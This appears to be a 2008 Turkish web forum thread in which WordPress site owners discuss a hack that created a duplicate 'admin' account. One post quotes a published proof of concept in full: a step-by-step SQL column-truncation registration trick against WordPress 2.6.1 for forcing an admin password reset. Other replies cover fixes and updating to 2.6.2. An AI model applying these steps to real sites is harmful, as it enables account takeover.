hacked! admin kullanıcısı 2 tane oldu
 

Arkadaşlar kendini birşey sanan arkadaş:) gelmiş admin kullanıcı ismiyle üye olmuş. Aynı kullanıcı ismi ile 2 kişi görünüyor ve giriş yapamıyordum. Sildim şifre değiştirdim. Ne önerirsiniz?

Tüm dosyaların CHMOD ayarlarını 664 yap

bana da yaptı bir kere denio nun biri :)

birde üşenmemiş tüm postları editleyip hacked by denio yazmış :D

644:o daha da mı düşüreyim

şu an üyeliği kapattım peşinden:) ama okul sitesi millet üyelik nerde diye bağırıyor

Benim Beşiktaş ile ilgili açtığım siteye Bursasporlular aynısını yapmıştı :D

siz nasıl çözdünüz

nasıl ya? ben şimdi anlamadım. birisi gelip wp sitemize "admin" kullanıcı adıyla kayıt olunca direk admin (yönetici) mi oluyor yani??

ewet aynen öyle adam register üye olurken
exploiti bu


# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin                                                      x
email: your email

^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be send to correct admin email ;/

# milw0rm.com [2008-09-07]

yani "admin" nicki hemen biz yapalimki böyle olay basimiza gelmesin öylemi? veya baska bisey yapabilirmiyiz ?

çok acayip birşey ya :( hemen yeni bi' sürüm lazım wp'ye :(

2.6.1 diyor, resmen skandal bu...

we have duplicated 'admin' account in database

evet ya çok acayip, diğer sürümlerde yokken en son sürümde olması biraz acayip oldu.

Siteyi üyeliğe kapatsak çözüm olur herhalde

coder by hayalet mesajı editleyip sil istersen o mesajı resmen sitelerin hacklenmesine davetiye cıkarıyorsun
kendi sitemde denedim o verdiğin şeyleride çalışıyor maalesef.

wordpress sesimizi mi duydu nedir WordPress 2.6.2 mevcut! Lütfen şimdi güncelleyin.

Helal olsun bunu bulana ve wordpress e.Onca kisinin emegi bi anda yok olabilir belkide olcak.Nası beceriyolar bunu anlamakta zorluk cekiyoruz..boyle bi hata olabilirmi..r10 ayrıca farkını gösterdi suan ilk burası yayımladı..yeni sürümü...

Aynı şeyi demin birisi bana da yapmaya çalıştı. %100 R10'dan ve %100 bu konuyu okuyanlardan birisi. Ancak unuttuğu birşey var ki o da benim bu tür "ucuz" numaraları yemeyeceğim ;).

IP adresi bende saklı ******'ya PM göndereceğim bakalım kimmiş bulabilecek miyiz :).

şu anda çözümü üye olmayı kaldırın yakında patch çıkar bulursam size yazarım

2.6.2 zaten çıkmış durumda :).

Şu anlık geçici çözüm üyeliği kapatmak.

Yeni Kullanıcının Varsayılan Konumu: Üye olarak belirleyin. Ayrıca Kullanıcılar sayfasından da kontrol edin ben Allah'tan az önce fark ettim de sildim hemen. Bu ******** kim ise bulup banlatacağım şayet ****** yardım ederse.

Bir diğer çözüm yolu ise wp-admin klasörünüze hosting hesabınızdan şifre sağlamak. Umarım kimsenin canı yanmaz zira çoğu kişi farkında değil :(.

Güncelleyin EN İyisi :) Wp 2.6.2
https://www.r10.net/wordpress/229508-...s-2-6-2-a.html

neyse güncelledim gitti
bu kadar saçma bir açık bıraktığı için WP yi kutluyorum

gerçekten wordpress e yuh dedim bu eski dandik sistemlerde olan bir açık nasıl wordpressde oluşmuş anlam veremiyorum. Hadi yine iyiyiz r10 da duyuldu . Bunun amele lamer forumlarında duyulduğunu düşünsenize gerçi buradan okuyan biri umarım yazmaz , moderatorlerden ricam arkadaşın mesajını editlemeniz.

ben hala 2.3.1 sürümünü kullanıyorum :D Eski ama sorunsuz yenisindede pek farkı yok

en iyisini yapıyorsun LANCE, yeni sürümlerde eklentiler çalışmıyor bile..

Sadece admin panel :)

ben 2.3 ile 2.5 arasındaki farkı aynı şeye benzetiyorum

XP ile Vista arasındaki farka :D

Buyrun arkadaşlar sizin için WordPress 2.3.1 Türkçe sürümünü Uploadladım açıksız güvenilir hızlı doya doya kullanın :D

RapidShare: Easy Filehosting

2.3.1'in güvenli olduğunu nereden çıkardınız? Ciddi bir sql injection açığı var 2.3.1'de. Google'dan aratarak bulabilirsiniz.

2.6.2 güvenli mi şimdi :D

ben de 2.5.1 de takılı kaldım :D

senin nickin "admin" adamda alıyor ve senin yetkine sahip lur sen k.adını dğeiştirirsen ne olur peki*

acemice bir açık olmuştu, neyse çözüldü. Ama daha büyük sorunlar var, mesela 24 saatte kategorilerin kaybolması..

Şu ana kadar en saglam surum WordPress 2.3.3 dür.
bakınız: milw0rm.com